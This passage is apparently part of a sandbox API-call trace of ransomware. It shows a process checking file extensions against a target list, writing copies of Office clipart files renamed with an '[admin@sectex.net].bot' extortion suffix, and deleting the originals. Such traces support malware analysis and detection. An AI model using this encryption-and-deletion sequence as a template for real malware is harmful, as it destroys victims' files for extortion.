	[0161.627] lstrlenW (lpString=".1cd") returned 4
	[0161.627] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 63
	[0161.627] lstrlenW (lpString=".jpg") returned 4
	[0161.627] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 63
	[0161.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 63
	[0161.628] lstrlenW (lpString=".doc") returned 4
	[0161.628] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.628] lstrlenW (lpString=".docx") returned 5
	[0161.628] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0161.628] lstrlenW (lpString=".pdf") returned 4
	[0161.628] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.628] lstrlenW (lpString=".xls") returned 4
	[0161.628] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.628] lstrlenW (lpString=".xlsx") returned 5
	[0161.628] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0161.628] lstrlenW (lpString=".ppt") returned 4
	[0161.628] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 63
	[0161.628] lstrlenW (lpString=".zip") returned 4
	[0161.628] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.628] lstrlenW (lpString=".rar") returned 4
	[0161.628] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.628] lstrlenW (lpString=".bz2") returned 4
	[0161.628] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.628] lstrlenW (lpString=".7z") returned 3
	[0161.628] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 63
	[0161.628] lstrlenW (lpString=".dbf") returned 4
	[0161.628] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 63
	[0161.628] lstrlenW (lpString=".1cd") returned 4
	[0161.628] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 63
	[0161.628] lstrlenW (lpString=".jpg") returned 4
	[0161.628] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.629] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.629] lstrlenW (lpString="J0107458.WMF") returned 12
	[0161.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107458.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.629] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=3568) returned 1
	[0161.629] CloseHandle (hObject=0x3f0) returned 1
	[0161.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107458.wmf")) returned 0x20
	[0161.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107458.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107458.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.630] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.630] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107458.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.631] GetLastError () returned 0x0
	[0161.631] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xdf0, lpOverlapped=0x0) returned 1
	[0161.632] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xe00, lpOverlapped=0x0) returned 1
	[0161.633] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.633] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.633] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.633] CloseHandle (hObject=0x3c4) returned 1
	[0161.634] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.634] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.635] CloseHandle (hObject=0x3f0) returned 1
	[0161.636] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.636] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107458.wmf")) returned 1
	[0161.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 63
	[0161.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 63
	[0161.637] lstrlenW (lpString=".doc") returned 4
	[0161.637] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.637] lstrlenW (lpString=".docx") returned 5
	[0161.637] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.637] lstrlenW (lpString=".pdf") returned 4
	[0161.637] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.637] lstrlenW (lpString=".xls") returned 4
	[0161.637] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.637] lstrlenW (lpString=".xlsx") returned 5
	[0161.637] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.637] lstrlenW (lpString=".ppt") returned 4
	[0161.637] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 63
	[0161.637] lstrlenW (lpString=".zip") returned 4
	[0161.637] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.637] lstrlenW (lpString=".rar") returned 4
	[0161.637] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.637] lstrlenW (lpString=".bz2") returned 4
	[0161.637] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.637] lstrlenW (lpString=".7z") returned 3
	[0161.637] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 63
	[0161.637] lstrlenW (lpString=".dbf") returned 4
	[0161.637] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 63
	[0161.637] lstrlenW (lpString=".1cd") returned 4
	[0161.637] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 63
	[0161.637] lstrlenW (lpString=".jpg") returned 4
	[0161.637] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 63
	[0161.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 63
	[0161.638] lstrlenW (lpString=".doc") returned 4
	[0161.638] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.638] lstrlenW (lpString=".docx") returned 5
	[0161.638] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.638] lstrlenW (lpString=".pdf") returned 4
	[0161.638] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.638] lstrlenW (lpString=".xls") returned 4
	[0161.638] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.638] lstrlenW (lpString=".xlsx") returned 5
	[0161.638] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.638] lstrlenW (lpString=".ppt") returned 4
	[0161.638] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 63
	[0161.638] lstrlenW (lpString=".zip") returned 4
	[0161.638] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.638] lstrlenW (lpString=".rar") returned 4
	[0161.638] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.638] lstrlenW (lpString=".bz2") returned 4
	[0161.638] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.638] lstrlenW (lpString=".7z") returned 3
	[0161.638] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 63
	[0161.638] lstrlenW (lpString=".dbf") returned 4
	[0161.638] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 63
	[0161.638] lstrlenW (lpString=".1cd") returned 4
	[0161.638] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 63
	[0161.638] lstrlenW (lpString=".jpg") returned 4
	[0161.638] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.197] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.197] lstrlenW (lpString="J0107490.WMF") returned 12
	[0162.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107490.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.201] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=16468) returned 1
	[0162.201] CloseHandle (hObject=0x3b8) returned 1
	[0162.201] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107490.wmf")) returned 0x20
	[0162.201] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107490.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107490.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.201] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.201] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107490.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0162.202] GetLastError () returned 0x0
	[0162.202] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x4054, lpOverlapped=0x0) returned 1
	[0162.204] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x4060, lpOverlapped=0x0) returned 1
	[0162.205] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.205] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.205] SetEndOfFile (hFile=0x25c) returned 1
	[0162.205] CloseHandle (hObject=0x25c) returned 1
	[0162.205] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.206] SetEndOfFile (hFile=0x3b8) returned 1
	[0162.208] CloseHandle (hObject=0x3b8) returned 1
	[0162.208] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.208] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107490.wmf")) returned 1
	[0162.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 63
	[0162.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 63
	[0162.209] lstrlenW (lpString=".doc") returned 4
	[0162.209] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.209] lstrlenW (lpString=".docx") returned 5
	[0162.209] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0162.209] lstrlenW (lpString=".pdf") returned 4
	[0162.209] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.209] lstrlenW (lpString=".xls") returned 4
	[0162.209] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.209] lstrlenW (lpString=".xlsx") returned 5
	[0162.209] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0162.209] lstrlenW (lpString=".ppt") returned 4
	[0162.209] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 63
	[0162.209] lstrlenW (lpString=".zip") returned 4
	[0162.209] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.209] lstrlenW (lpString=".rar") returned 4
	[0162.209] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.209] lstrlenW (lpString=".bz2") returned 4
	[0162.209] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.209] lstrlenW (lpString=".7z") returned 3
	[0162.209] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 63
	[0162.209] lstrlenW (lpString=".dbf") returned 4
	[0162.209] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 63
	[0162.209] lstrlenW (lpString=".1cd") returned 4
	[0162.209] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 63
	[0162.210] lstrlenW (lpString=".jpg") returned 4
	[0162.210] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 63
	[0162.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 63
	[0162.210] lstrlenW (lpString=".doc") returned 4
	[0162.210] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.210] lstrlenW (lpString=".docx") returned 5
	[0162.210] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0162.210] lstrlenW (lpString=".pdf") returned 4
	[0162.210] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.210] lstrlenW (lpString=".xls") returned 4
	[0162.210] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.210] lstrlenW (lpString=".xlsx") returned 5
	[0162.210] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0162.210] lstrlenW (lpString=".ppt") returned 4
	[0162.210] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 63
	[0162.210] lstrlenW (lpString=".zip") returned 4
	[0162.210] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.210] lstrlenW (lpString=".rar") returned 4
	[0162.210] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.210] lstrlenW (lpString=".bz2") returned 4
	[0162.210] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.210] lstrlenW (lpString=".7z") returned 3
	[0162.210] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 63
	[0162.210] lstrlenW (lpString=".dbf") returned 4
	[0162.210] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 63
	[0162.210] lstrlenW (lpString=".1cd") returned 4
	[0162.210] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 63
	[0162.211] lstrlenW (lpString=".jpg") returned 4
	[0162.211] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.211] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.211] lstrlenW (lpString="J0107492.WMF") returned 12
	[0162.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107492.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.212] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=6860) returned 1
	[0162.212] CloseHandle (hObject=0x3b8) returned 1
	[0162.212] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107492.wmf")) returned 0x20
	[0162.212] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107492.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107492.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.212] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.213] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107492.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0162.213] GetLastError () returned 0x0
	[0162.213] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1acc, lpOverlapped=0x0) returned 1
	[0162.215] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1ad0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1ad0, lpOverlapped=0x0) returned 1
	[0162.216] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.216] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.216] SetEndOfFile (hFile=0x25c) returned 1
	[0162.216] CloseHandle (hObject=0x25c) returned 1
	[0162.216] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.216] SetEndOfFile (hFile=0x3b8) returned 1
	[0162.218] CloseHandle (hObject=0x3b8) returned 1
	[0162.218] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.219] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107492.wmf")) returned 1
	[0162.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 63
	[0162.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 63
	[0162.219] lstrlenW (lpString=".doc") returned 4
	[0162.219] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.219] lstrlenW (lpString=".docx") returned 5
	[0162.219] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0162.219] lstrlenW (lpString=".pdf") returned 4
	[0162.219] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.219] lstrlenW (lpString=".xls") returned 4
	[0162.219] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.219] lstrlenW (lpString=".xlsx") returned 5
	[0162.219] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0162.220] lstrlenW (lpString=".ppt") returned 4
	[0162.220] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 63
	[0162.220] lstrlenW (lpString=".zip") returned 4
	[0162.220] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.220] lstrlenW (lpString=".rar") returned 4
	[0162.220] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.220] lstrlenW (lpString=".bz2") returned 4
	[0162.220] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.220] lstrlenW (lpString=".7z") returned 3
	[0162.220] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 63
	[0162.220] lstrlenW (lpString=".dbf") returned 4
	[0162.220] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 63
	[0162.220] lstrlenW (lpString=".1cd") returned 4
	[0162.220] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 63
	[0162.220] lstrlenW (lpString=".jpg") returned 4
	[0162.220] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
